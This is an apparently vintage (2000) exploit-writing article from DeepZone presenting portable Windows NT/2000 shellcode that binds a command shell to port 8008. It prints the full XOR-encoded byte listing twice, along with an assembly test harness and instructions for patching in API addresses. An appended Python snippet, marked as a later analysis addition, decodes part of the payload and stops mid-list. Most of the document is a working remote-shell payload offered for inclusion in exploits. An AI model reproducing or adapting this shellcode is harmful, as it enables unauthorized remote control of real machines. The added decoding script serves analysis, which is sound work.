	___________________________________________________________________


		       (c) 2000 DeepZone. All rights reserved.

		     _-=[ plug&play WinNT/2k remote shellcode ]=-_

                              by |Zan <izan@deepzone.org>

		http://www.deepzone.org - http://mareasvivas.cjb.net

	___________________________________________________________________


	
	Background
	__________

	At present, the number of overflows appearing for the NT kernel
	is becoming an immense problem for administrators running
	WinNT/2K.

	Since the possibility of exploiting this type of vulnerability
	with some guarantees has arisen, many people are announcing new
	bofs, accompanying their warnings with some kind of code in which
	addresses, files or an apparent configuration are presupposed,
	which need not hold on a real remote system.

	The real problem would arise if there were portable code which
	any hacker could easily include in his/her exploit.


	Introduction
	____________

	This text is not going to review the principle of stack
	rewriting and the control of program flow which lies behind
	classic stack overflowing.
 
	Numerous resources can be found on the WWW, along with adequate
	bibliography, to understand this last point or to document
	oneself on a certain matter related to it. In any case, at the
	end of this commentary you can find the most popular references
	on stack overflows and the theory which lies behind them [1].

	The following two sections of this document show a portable
	shellcode for WinNT/2K that creates a listening console on port
	8008, along with its integration in a generic exploit.


	plug&play shellcode
	___________________

	; -- begin x86/asm --

        LLB1    equ     (00h xor 99h)
        LLB2    equ     (00h xor 99h)
        LLB3    equ     (00h xor 99h)
        LLB4    equ     (00h xor 99h)

        GPB1    equ     (00h xor 99h)
        GPB2    equ     (00h xor 99h)
        GPB3    equ     (00h xor 99h)
        GPB4    equ     (00h xor 99h)

	DeepZone_w32ShellCode:
	db 068h, 05eh, 056h, 0c3h, 090h, 054h, 059h, 0ffh, 0d1h
	db 058h, 033h, 0c9h, 0b1h, 01ch, 090h, 090h, 090h, 090h
	db 003h, 0f1h, 056h, 05fh, 033h, 0c9h, 066h, 0b9h, 095h
	db 004h, 090h, 090h, 090h, 0ach, 034h, 099h, 0aah, 0e2h
	db 0fah, 071h, 099h, 099h, 099h, 099h, 0c4h, 018h, 074h
	db 040h, 0b8h, 0d9h, 099h, 014h, 02ch, 06bh, 0bdh, 0d9h
	db 099h, 014h, 024h, 063h, 0bdh, 0d9h, 099h, 0f3h, 09eh
	db 009h, 009h, 009h, 009h, 0c0h, 071h, 04bh, 09bh, 099h
	db 099h, 014h, 02ch, 0b3h, 0bch, 0d9h, 099h, 014h, 024h
	db 0aah, 0bch, 0d9h, 099h, 0f3h, 093h, 009h, 009h, 009h
	db 009h, 0c0h, 071h, 023h, 09bh, 099h, 099h, 0f3h, 099h
	db 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 07ch, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch, 070h, 0bch
	db 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch, 0d9h, 099h
	db 0f3h, 099h, 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh
	db 014h, 02ch, 074h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 068h, 0bch, 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch
	db 0d9h, 099h, 05eh, 01ch, 06ch, 0bch, 0d9h, 099h, 0ddh
	db 099h, 099h, 099h, 014h, 02ch, 06ch, 0bch, 0d9h, 099h
	db 0cfh, 066h, 00ch, 0aeh, 0bch, 0d9h, 099h, 014h, 02ch
	db 0b4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0cah
	db 0bch, 0d9h, 099h, 014h, 02ch, 0a8h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0cah, 0bch, 0d9h, 099h, 014h
	db 02ch, 068h, 0bch, 0d9h, 099h, 014h, 024h, 0b4h, 0bfh
	db 0d9h, 099h, 03ch, 014h, 02ch, 07ch, 0bch, 0d9h, 099h
	db 034h, 014h, 024h, 0a8h, 0bfh, 0d9h, 099h, 032h, 014h
	db 024h, 0ach, 0bfh, 0d9h, 099h, 032h, 05eh, 01ch, 0bch
	db 0bfh, 0d9h, 099h, 099h, 099h, 099h, 099h, 05eh, 01ch
	db 0b8h, 0bfh, 0d9h, 099h, 098h, 098h, 099h, 099h, 014h
	db 02ch, 0a0h, 0bfh, 0d9h, 099h, 0cfh, 014h, 02ch, 06ch
	db 0bch, 0d9h, 099h, 0cfh, 0f3h, 099h, 0f3h, 099h, 0f3h
	db 089h, 0f3h, 098h, 0f3h, 099h, 0f3h, 099h, 014h, 02ch
	db 0d0h, 0bfh, 0d9h, 099h, 0cfh, 0f3h, 099h, 066h, 00ch
	db 0a2h, 0bch, 0d9h, 099h, 0f1h, 099h, 0b9h, 099h, 099h
	db 009h, 0f1h, 099h, 09bh, 099h, 099h, 066h, 00ch, 0dah
	db 0bch, 0d9h, 099h, 010h, 01ch, 0c8h, 0bfh, 0d9h, 099h
	db 0aah, 059h, 0c9h, 0d9h, 0c9h, 0d9h, 0c9h, 066h, 00ch
	db 063h, 0bdh, 0d9h, 099h, 0c9h, 0c2h, 0f3h, 089h, 014h
	db 02ch, 050h, 0bch, 0d9h, 099h, 0cfh, 0cah, 066h, 00ch
	db 067h, 0bdh, 0d9h, 099h, 0f3h, 09ah, 0cah, 066h, 00ch
	db 09bh, 0bch, 0d9h, 099h, 014h, 02ch, 0cch, 0bfh, 0d9h
	db 099h, 0cfh, 014h, 02ch, 050h, 0bch, 0d9h, 099h, 0cfh
	db 0cah, 066h, 00ch, 09fh, 0bch, 0d9h, 099h, 014h, 024h
	db 0c0h, 0bfh, 0d9h, 099h, 032h, 0aah, 059h, 0c9h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h, 0c9h, 0c9h
	db 014h, 02ch, 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h
	db 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch
	db 0d6h, 0bch, 0d9h, 099h, 072h, 0d4h, 009h, 009h, 009h
	db 0aah, 059h, 0c9h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 0ceh, 0c9h, 0c9h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h
	db 099h, 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h
	db 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 01ah
	db 024h, 0fch, 0bfh, 0d9h, 099h, 09bh, 096h, 01bh, 08eh
	db 098h, 099h, 099h, 018h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 098h, 0b9h, 099h, 099h, 0ebh, 097h, 009h, 009h, 009h
	db 009h, 05eh, 01ch, 0fch, 0bfh, 0d9h, 099h, 099h, 0b9h
	db 099h, 099h, 0f3h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h
	db 099h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h
	db 012h, 01ch, 0c8h, 0bfh, 0d9h, 099h, 0c9h, 014h, 02ch
	db 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0deh
	db 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch
	db 0d9h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h, 099h, 0f3h
	db 099h, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 093h, 0bch, 0d9h, 099h, 0f3h, 099h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0f3h, 099h, 0f3h
	db 099h, 0f3h, 099h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0aah, 050h
	db 0a0h, 014h, 0fch, 0bfh, 0d9h, 099h, 096h, 01eh, 0feh
	db 066h, 066h, 066h, 0f3h, 099h, 0f1h, 099h, 0b9h, 099h
	db 099h, 009h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 097h, 0bch, 0d9h, 099h, 010h, 01ch, 0f8h
	db 0bfh, 0d9h, 099h, 0f3h, 099h, 014h, 024h, 0fch, 0bfh
	db 0d9h, 099h, 0ceh, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h
	db 099h, 034h, 0c9h, 014h, 02ch, 074h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0d2h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0f3h, 099h
	db 012h, 01ch, 0f8h, 0bfh, 0d9h, 099h, 014h, 024h, 0fch
	db 0bfh, 0d9h, 099h, 0ceh, 0c9h, 012h, 01ch, 0c8h, 0bfh
	db 0d9h, 099h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0deh, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 070h, 020h
	db 067h, 066h, 066h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 08bh, 0bch, 0d9h, 099h, 014h
	db 02ch, 0c4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch
	db 08bh, 0bch, 0d9h, 099h, 0f3h, 099h, 066h, 00ch, 0ceh
	db 0bch, 0d9h, 099h, 0c8h, 0cfh, 0f1h, LLB4, LLB3, LLB2
	db LLB1, 009h, 0c3h, 066h, 08bh, 0c9h, 0c2h, 0c0h, 0ceh
	db 0c7h, 0c8h, 0cfh, 0cah, 0f1h, GPB4, GPB3, GPB2, GPB1
	db 009h, 0c3h, 066h, 08bh, 0c9h, 035h, 01dh, 059h, 0ech
	db 062h, 0c1h, 032h, 0c0h, 07bh, 070h, 05ah, 0ceh, 0cah
	db 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah
	db 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
	db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah
	db 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh
	db 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 0fah, 0f5h, 0f6h
	db 0eah, 0fch, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
	db 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh
	db 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
	db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0c9h, 0fch, 0fch
	db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h
	db 0f5h, 0f5h, 0f6h, 0fah, 099h, 0cbh, 0fch, 0f8h, 0fdh
	db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0ceh, 0ebh, 0f0h, 0edh
	db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch
	db 0fch, 0e9h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
	db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0dch, 0e1h, 0f0h
	db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
	db 0dah, 0f6h, 0fdh, 0fch, 0fdh, 0b9h, 0fbh, 0e0h, 0b9h
	db 0e5h, 0c3h, 0f8h, 0f7h, 0b9h, 0a5h, 0f0h, 0e3h, 0f8h
	db 0f7h, 0d9h, 0fdh, 0fch, 0fch, 0e9h, 0e3h, 0f6h, 0f7h
	db 0fch, 0b7h, 0f6h, 0ebh, 0feh, 0a7h, 09bh, 099h, 086h
	db 0d1h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 095h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 098h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0dah
	db 0d4h, 0ddh, 0b7h, 0dch, 0c1h, 0dch, 099h, 099h, 099h
	db 099h, 099h, 089h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 090h, 090h, 090h, 090h, 090h

	; -- end x86/asm --


	howto ?
	_______

	let's see this code ...

	; Tasm 5.0/x86

	.386p
	locals
	jumps
	.model flat, stdcall

	extrn LoadLibraryA:PROC
	extrn GetProcAddress:PROC
        extrn WSAStartup:PROC


	.data

        wsadescription_len equ 256
        wsasys_status_len equ 128

        WSAdata struct
                wVersion       dw ?
                wHighVersion   dw ?
                szDescription  db wsadescription_len+1 dup (?)
                szSystemStatus db wsasys_status_len+1  dup (?)
                iMaxSockets    dw ?
                iMaxUdpDg      dw ?
                               dw ?   ; alignment padding, as in the C WSADATA layout
                lpVendorInfo   dd ?   ; char FAR*: 4 bytes on Win32, not 2
        WSAdata ends
        wsadata WSAdata <?>

	__strKERNEL32		db	'KERNEL32', 0
	__strExitProcess	db	'ExitProcess', 0		

	
	; -- begin x86/asm --

        LLB1    equ     (00h xor 99h)
        LLB2    equ     (40h xor 99h)
        LLB3    equ     (30h xor 99h)
        LLB4    equ     (50h xor 99h)

        GPB1    equ     (00h xor 99h)
        GPB2    equ     (40h xor 99h)
        GPB3    equ     (30h xor 99h)
        GPB4    equ     (54h xor 99h)

	DeepZone_w32ShellCode:
	db 068h, 05eh, 056h, 0c3h, 090h, 054h, 059h, 0ffh, 0d1h
	db 058h, 033h, 0c9h, 0b1h, 01ch, 090h, 090h, 090h, 090h
	db 003h, 0f1h, 056h, 05fh, 033h, 0c9h, 066h, 0b9h, 095h
	db 004h, 090h, 090h, 090h, 0ach, 034h, 099h, 0aah, 0e2h
	db 0fah, 071h, 099h, 099h, 099h, 099h, 0c4h, 018h, 074h
	db 040h, 0b8h, 0d9h, 099h, 014h, 02ch, 06bh, 0bdh, 0d9h
	db 099h, 014h, 024h, 063h, 0bdh, 0d9h, 099h, 0f3h, 09eh
	db 009h, 009h, 009h, 009h, 0c0h, 071h, 04bh, 09bh, 099h
	db 099h, 014h, 02ch, 0b3h, 0bch, 0d9h, 099h, 014h, 024h
	db 0aah, 0bch, 0d9h, 099h, 0f3h, 093h, 009h, 009h, 009h
	db 009h, 0c0h, 071h, 023h, 09bh, 099h, 099h, 0f3h, 099h
	db 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 07ch, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch, 070h, 0bch
	db 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch, 0d9h, 099h
	db 0f3h, 099h, 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh
	db 014h, 02ch, 074h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 068h, 0bch, 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch
	db 0d9h, 099h, 05eh, 01ch, 06ch, 0bch, 0d9h, 099h, 0ddh
	db 099h, 099h, 099h, 014h, 02ch, 06ch, 0bch, 0d9h, 099h
	db 0cfh, 066h, 00ch, 0aeh, 0bch, 0d9h, 099h, 014h, 02ch
	db 0b4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0cah
	db 0bch, 0d9h, 099h, 014h, 02ch, 0a8h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0cah, 0bch, 0d9h, 099h, 014h
	db 02ch, 068h, 0bch, 0d9h, 099h, 014h, 024h, 0b4h, 0bfh
	db 0d9h, 099h, 03ch, 014h, 02ch, 07ch, 0bch, 0d9h, 099h
	db 034h, 014h, 024h, 0a8h, 0bfh, 0d9h, 099h, 032h, 014h
	db 024h, 0ach, 0bfh, 0d9h, 099h, 032h, 05eh, 01ch, 0bch
	db 0bfh, 0d9h, 099h, 099h, 099h, 099h, 099h, 05eh, 01ch
	db 0b8h, 0bfh, 0d9h, 099h, 098h, 098h, 099h, 099h, 014h
	db 02ch, 0a0h, 0bfh, 0d9h, 099h, 0cfh, 014h, 02ch, 06ch
	db 0bch, 0d9h, 099h, 0cfh, 0f3h, 099h, 0f3h, 099h, 0f3h
	db 089h, 0f3h, 098h, 0f3h, 099h, 0f3h, 099h, 014h, 02ch
	db 0d0h, 0bfh, 0d9h, 099h, 0cfh, 0f3h, 099h, 066h, 00ch
	db 0a2h, 0bch, 0d9h, 099h, 0f1h, 099h, 0b9h, 099h, 099h
	db 009h, 0f1h, 099h, 09bh, 099h, 099h, 066h, 00ch, 0dah
	db 0bch, 0d9h, 099h, 010h, 01ch, 0c8h, 0bfh, 0d9h, 099h
	db 0aah, 059h, 0c9h, 0d9h, 0c9h, 0d9h, 0c9h, 066h, 00ch
	db 063h, 0bdh, 0d9h, 099h, 0c9h, 0c2h, 0f3h, 089h, 014h
	db 02ch, 050h, 0bch, 0d9h, 099h, 0cfh, 0cah, 066h, 00ch
	db 067h, 0bdh, 0d9h, 099h, 0f3h, 09ah, 0cah, 066h, 00ch
	db 09bh, 0bch, 0d9h, 099h, 014h, 02ch, 0cch, 0bfh, 0d9h
	db 099h, 0cfh, 014h, 02ch, 050h, 0bch, 0d9h, 099h, 0cfh
	db 0cah, 066h, 00ch, 09fh, 0bch, 0d9h, 099h, 014h, 024h
	db 0c0h, 0bfh, 0d9h, 099h, 032h, 0aah, 059h, 0c9h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h, 0c9h, 0c9h
	db 014h, 02ch, 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h
	db 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch
	db 0d6h, 0bch, 0d9h, 099h, 072h, 0d4h, 009h, 009h, 009h
	db 0aah, 059h, 0c9h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 0ceh, 0c9h, 0c9h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h
	db 099h, 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h
	db 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 01ah
	db 024h, 0fch, 0bfh, 0d9h, 099h, 09bh, 096h, 01bh, 08eh
	db 098h, 099h, 099h, 018h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 098h, 0b9h, 099h, 099h, 0ebh, 097h, 009h, 009h, 009h
	db 009h, 05eh, 01ch, 0fch, 0bfh, 0d9h, 099h, 099h, 0b9h
	db 099h, 099h, 0f3h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h
	db 099h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h
	db 012h, 01ch, 0c8h, 0bfh, 0d9h, 099h, 0c9h, 014h, 02ch
	db 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0deh
	db 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch
	db 0d9h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h, 099h, 0f3h
	db 099h, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 093h, 0bch, 0d9h, 099h, 0f3h, 099h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0f3h, 099h, 0f3h
	db 099h, 0f3h, 099h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0aah, 050h
	db 0a0h, 014h, 0fch, 0bfh, 0d9h, 099h, 096h, 01eh, 0feh
	db 066h, 066h, 066h, 0f3h, 099h, 0f1h, 099h, 0b9h, 099h
	db 099h, 009h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 097h, 0bch, 0d9h, 099h, 010h, 01ch, 0f8h
	db 0bfh, 0d9h, 099h, 0f3h, 099h, 014h, 024h, 0fch, 0bfh
	db 0d9h, 099h, 0ceh, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h
	db 099h, 034h, 0c9h, 014h, 02ch, 074h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0d2h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0f3h, 099h
	db 012h, 01ch, 0f8h, 0bfh, 0d9h, 099h, 014h, 024h, 0fch
	db 0bfh, 0d9h, 099h, 0ceh, 0c9h, 012h, 01ch, 0c8h, 0bfh
	db 0d9h, 099h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0deh, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 070h, 020h
	db 067h, 066h, 066h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 08bh, 0bch, 0d9h, 099h, 014h
	db 02ch, 0c4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch
	db 08bh, 0bch, 0d9h, 099h, 0f3h, 099h, 066h, 00ch, 0ceh
	db 0bch, 0d9h, 099h, 0c8h, 0cfh, 0f1h, LLB4, LLB3, LLB2
	db LLB1, 009h, 0c3h, 066h, 08bh, 0c9h, 0c2h, 0c0h, 0ceh
	db 0c7h, 0c8h, 0cfh, 0cah, 0f1h, GPB4, GPB3, GPB2, GPB1
	db 009h, 0c3h, 066h, 08bh, 0c9h, 035h, 01dh, 059h, 0ech
	db 062h, 0c1h, 032h, 0c0h, 07bh, 070h, 05ah, 0ceh, 0cah
	db 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah
	db 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
	db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah
	db 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh
	db 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 0fah, 0f5h, 0f6h
	db 0eah, 0fch, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
	db 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh
	db 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
	db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0c9h, 0fch, 0fch
	db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h
	db 0f5h, 0f5h, 0f6h, 0fah, 099h, 0cbh, 0fch, 0f8h, 0fdh
	db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0ceh, 0ebh, 0f0h, 0edh
	db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch
	db 0fch, 0e9h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
	db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0dch, 0e1h, 0f0h
	db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
	db 0dah, 0f6h, 0fdh, 0fch, 0fdh, 0b9h, 0fbh, 0e0h, 0b9h
	db 0e5h, 0c3h, 0f8h, 0f7h, 0b9h, 0a5h, 0f0h, 0e3h, 0f8h
	db 0f7h, 0d9h, 0fdh, 0fch, 0fch, 0e9h, 0e3h, 0f6h, 0f7h
	db 0fch, 0b7h, 0f6h, 0ebh, 0feh, 0a7h, 09bh, 099h, 086h
	db 0d1h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 095h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 098h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0dah
	db 0d4h, 0ddh, 0b7h, 0dch, 0c1h, 0dch, 099h, 099h, 099h
	db 099h, 099h, 089h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 090h, 090h, 090h, 090h, 090h

	; -- end x86/asm --
	

	.code

	start:
		
		push    offset wsadata
		push    0101h
		call    WSAStartup

                jmp     DeepZone_w32ShellCode	; testing purposes
						
		push	offset	__strKERNEL32
		call	LoadLibraryA
		push	offset	__strExitProcess
		push	eax
                call    GetProcAddress
		push	0
		call	eax
	
	end start


	The previous code has been designed to work with only the two
	API addresses which are present in 99% of the cases in a
	Windows executable. It obtains the address of ExitProcess
	dynamically and ends its execution with the return value 0,
	ignoring the shellcode if the unconditional jump is not
	executed.

	On the other hand, if the unconditional jump is executed
	the shellcode takes command.

	The first three lines initialize Winsock, because on the remote
	server where the b0f occurs Winsock has already been initialized
	by the time of the overflow, and the shellcode does not really
	need to reinitialize it.


	If we inspect the code more closely we can see that the calls
	to the LoadLibraryA and GetProcAddress APIs are made by means
	of an indirect jump...


	LoadLibraryA     ----->   jmp dword ptr [00403050]
	GetProcAddress   ----->   jmp dword ptr [00403054]


	The addresses we are looking for are ..........

	00403050 for LoadlibraryA and 00403054 for GetProcAddress.

	The shellcode has been xored with a value of 99h in order to
	eliminate possible null bytes, so when we store the addresses
	this fact must be taken into account.

	At this point we insert these two addresses, xored byte by
	byte, and execute the test code, simulating the hijacking of
	the flow by means of an unconditional jump to the shellcode.
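As an added analysis example (not part of the original article and not DeepZone's code), the following Python script shows the 99h XOR described above from the analyst's side: it checks that the encoded body contains no null bytes, decodes a slice of the listing back into the API names the payload resolves, and recovers the little-endian dword hidden behind the LLB1..LLB4 bytes. The slice of encoded bytes is copied from the db listing above; the function names and the report layout are this example's own.

```python
import re

# XOR key used by the article's shellcode (99h).
XOR_KEY = 0x99

# A slice of the encoded body, copied from the db listing above (the bytes
# following the decoder stub that spell out the Winsock import names).
ENCODED_SLICE = bytes([
    0xce, 0xca, 0xd6, 0xda, 0xd2, 0xaa, 0xab, 0x99,   # WSOCK32\0
    0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,         # socket\0
    0xfb, 0xf0, 0xf7, 0xfd, 0x99,                     # bind\0
    0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,         # listen\0
    0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99,         # accept\0
    0xea, 0xfc, 0xf7, 0xfd, 0x99,                     # send\0
    0xeb, 0xfc, 0xfa, 0xef, 0x99,                     # recv\0
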